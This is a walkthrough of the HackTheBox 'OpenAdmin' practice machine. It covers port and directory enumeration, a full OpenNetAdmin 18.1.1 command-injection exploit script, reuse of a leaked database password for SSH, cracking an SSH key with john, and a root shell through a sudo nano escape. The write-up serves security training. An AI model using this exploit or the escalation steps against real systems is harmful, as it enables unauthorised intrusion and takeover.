Hack The Box

HackTheBox “OpenAdmin” Walkthrough

OpenAdmin, an easy-level Linux OS machine on HackTheBox, involves conducting some enumeration to uncover an instance of OpenNetAdmin. Leveraging a remote code execution exploit within OpenNetAdmin, I successfully…

OpenAdmin, an easy-level Linux OS machine on HackTheBox, involves conducting some enumeration to uncover an instance of OpenNetAdmin. Leveraging a remote code execution exploit within OpenNetAdmin, I successfully attain a shell under the www-data context. Notably, the reuse of database credentials by one of the users becomes a pivotal discovery. Subsequently, I proceed to advance my position by targeting the second user. This is achieved by exploiting an internal website, where options include executing code or circumventing the login to obtain an SSH key. The culmination of this endeavor entails achieving root access. To this end, I capitalize on a sudo privilege associated with the nano utility, effectively harnessing GTFObins to attain a privileged root shell.

HackTheBox “OpenAdmin” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “OpenAdmin” Walkthrough, figure 2

Visit the target at port 80.

HackTheBox “OpenAdmin” Walkthrough, figure 3

We get only the default Apache installation page. So, the subsequent action involves executing a Feroxbuster scan to identify concealed files or directories:

HackTheBox “OpenAdmin” Walkthrough, figure 4

Upon thoroughly examining all the directories, we came across a webpage housing a login interface.

HackTheBox “OpenAdmin” Walkthrough, figure 5

Upon checking the login page, we get the dashboard for “Open Net Admin” app.

Let’s searchsploit it.

HackTheBox “OpenAdmin” Walkthrough, figure 6

Having a look at the content, we can know to run it against the target.

└─$ cat 47691.sh # Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution# Date: 2019-11-19# Exploit Author: mattpascoe# Vendor Homepage: http://opennetadmin.com/# Software Link: https://github.com/opennetadmin/ona# Version: v18.1.1# Tested on: Linux# Exploit Title: OpenNetAdmin v18.1.1 RCE# Date: 2019-11-19# Exploit Author: mattpascoe# Vendor Homepage: http://opennetadmin.com/# Software Link: https://github.com/opennetadmin/ona# Version: v18.1.1# Tested on: Linux#!/bin/bashURL="${1}"while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1done

Exploitation:

Run the bash exploit.

HackTheBox “OpenAdmin” Walkthrough, figure 7

We start enumerating this machine by first, right here in the current directory, we have numerous folders.

HackTheBox “OpenAdmin” Walkthrough, figure 8

Check the local directory and then to config directory.

HackTheBox “OpenAdmin” Walkthrough, figure 9

Let’s cat the php file we got.

$ cat local/config/database_settings.inc.php<?php$ona_contexts=array (  'DEFAULT' =>   array (    'databases' =>     array (      0 =>       array (        'db_type' => 'mysqli',        'db_host' => 'localhost',        'db_login' => 'ona_sys',        'db_passwd' => 'n1nj4W4rri0R!',        'db_database' => 'ona_default',        'db_debug' => false,      ),    ),    'description' => 'Default data context',    'context_color' => '#D3DBFF',  ),);

Now, we have obtained credentials for MySQLi database. Let’s proceed to know the users via the home directory of this system.

HackTheBox “OpenAdmin” Walkthrough, figure 10

Two users: “Jimmy” and “Joanna”.

Since we have port 22 running on the target, let’s ssh into it using the creds:

jimmy:n1nj4W4rri0R!

HackTheBox “OpenAdmin” Walkthrough, figure 11

Let’s enumerate more through jimmy’s profile starting with /var.

HackTheBox “OpenAdmin” Walkthrough, figure 12

We got /internal directory. Let’s cat the php file main.

HackTheBox “OpenAdmin” Walkthrough, figure 13

Main.php appears to be processing a system command designed to display the SSH private key belonging to joanna.

For the PHP code to function, it needs to be hosted on a web server, and a specific port is required. Let’s check what ports we have on the target.

HackTheBox “OpenAdmin” Walkthrough, figure 14

We get port 52846 on the localhost. Intrigued, I decided to explore whether I could access this page using the curl tool. Our objective is to determine which specific localhost port hosts the execution of the “main.php” file. To achieve this, we’ll employ the following command:

curl <http://127.0.0.1:52846/main.php>

HackTheBox “OpenAdmin” Walkthrough, figure 15

Move the SSH private key to our attack box and then use ssh2john to make it a crackable hash format for john.

HackTheBox “OpenAdmin” Walkthrough, figure 16

John The Ripper.

HackTheBox “OpenAdmin” Walkthrough, figure 17

Now, let’s go to joanna. We’ll employ the passphrase “bloodninjas” in conjunction with the corresponding private key.

HackTheBox “OpenAdmin” Walkthrough, figure 18

Privilege Escalation:

Let’s check what joanna has for us.

HackTheBox “OpenAdmin” Walkthrough, figure 19

We can use sudo nano with no password, and GTFObins has a way in for us.

HackTheBox “OpenAdmin” Walkthrough, figure 20

Now, we run: sudo nano /opt/priv then we escape it to execute the command reset; sh 1>&0 2>&0 .

HackTheBox “OpenAdmin” Walkthrough, figure 21

And we get a root shell.

HackTheBox “OpenAdmin” Walkthrough, figure 22

Cheers.